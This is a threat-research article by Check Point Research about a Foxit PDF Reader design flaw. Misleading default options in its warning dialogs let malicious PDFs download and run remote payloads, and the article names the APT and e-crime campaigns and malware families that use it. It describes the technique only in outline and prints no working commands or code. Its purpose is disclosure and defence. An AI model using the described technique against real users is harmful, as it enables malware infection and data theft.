BylinesCyber SafetyDevice & IoTThreat Detection & Defense

Foxit PDF Reader “Flawed Design”: Hidden Dangers Lurking in Common Tools

by Eli Smadja, Head of Research, Check Point Research

PDF files have become an integral part of modern digital communication, having evolved into a standard format for presenting text, images, and multimedia content with consistent layout and formatting, irrespective of the software, hardware, or operating system used to view them.

In the realm of PDF viewers, Adobe Acrobat Reader reigns supreme as the industry’s dominant player. However, while Adobe Acrobat Reader holds the biggest market share, notable contenders are vying for attention, with Foxit PDF Reader being a prominent alternative, with more than 700 million users located in more than 200 countries.

Check Point Research has identified an unusual pattern of behaviour involving PDF exploitation, mainly targeting users of Foxit Reader. This exploit triggers security warnings that could deceive unsuspecting users into executing harmful commands. Check Point Research has observed variants of this exploit being actively utilized in the wild.

Flaws within the Design
The exploitation takes advantage of the flawed design of Warning messages in Foxit Reader which provide as default options that are the most harmful. Once a careless user proceeds twice with the default option, the exploit triggers, downloading and executing a payload from a remote server.


Figure 1: Default option triggering malicious command.

This exploit has been used by multiple threat actors, in use on e-crime and espionage. Check Point Research isolated and investigated three in-depth cases, ranging from an espionage campaign to e-crime with multiple links and tools, achieving impressive attack chains.

One of the most prominent campaigns leveraging this exploit has been possibly performed by the espionage group known as APT-C-35 / DoNot Team. Based on the specific malware deployed, the commands sent to the Bots, and the obtained victim data, the Threat Actor has the capability of performing hybrid campaigns targeting Windows and Android devices, which also resulted in a Two Factor Authentication (2FA) bypass.

This exploit has also been used by various Cyber-crime actors distributing the most prominent malware families such as:

  • VenomRAT

  • Agent-Tesla

  • Remcos

  • NjRAT

  • NanoCore RAT

  • Pony

  • Xworm

  • AsyncRAT

  • DCRat

Check Point Research followed the links of a campaign possibly distributed via Facebook, which resulted in an impressive attack chain to drop an infostealer and two crypt-miners.


Figure 2: The Attack Chain

During another campaign, Check Point Research identified the Threat Actor as @silentkillertv performing a campaign utilising two chained PDF files while one was hosted on a legitimate website, trello.com. The Threat Actor is also selling malicious tools and, on the 27th of April, advertised this exploit.


Figure 3: Telegram Channel Advertisement

While researching, Check Point obtained multiple builders that actors possess which create malicious PDF files taking advantage of this exploit. The majority of the collected PDFs were executing a PowerShell command which was downloading a payload from a remote server and then executing, though on some occasions other commands were used.


Figure 4: PDF Commands Executed Analysis

While this “exploit” doesn’t fit the classical definition of triggering malicious activities, it could be more accurately categorised as a form of “phishing” or manipulation aimed at Foxit PDF Reader users, coaxing them into habitually clicking “OK” without understanding the potential risks involved.

Threat Actors vary from E-crime to APT groups, with the underground ecosystem taking advantage of this “exploit” for years, as it had been “rolling undetected” as most AV & Sandboxes utilise the major player in PDF Readers, Adobe. The infection success and the low detection rate allows malicious PDFs to be distributed via many untraditional ways, such as Facebook, without being stopped by any detection rules. Check Point Research reported the issue to Foxit Reader, which acknowledged it and stated that it would be resolved in version 2024 3.

With the increasing sophistication of social engineering tactics, it is imperative for users to be aware and vigilant and to stay informed, exercise caution, and implement robust security measures, such as multi-factor authentication and security awareness training, to mitigate the risk of falling victim to such attacks.

Eli Smadja

Head of Research, Check Point Research

Related Articles

Leave a Reply

Your email address will not be published. Required fields are marked *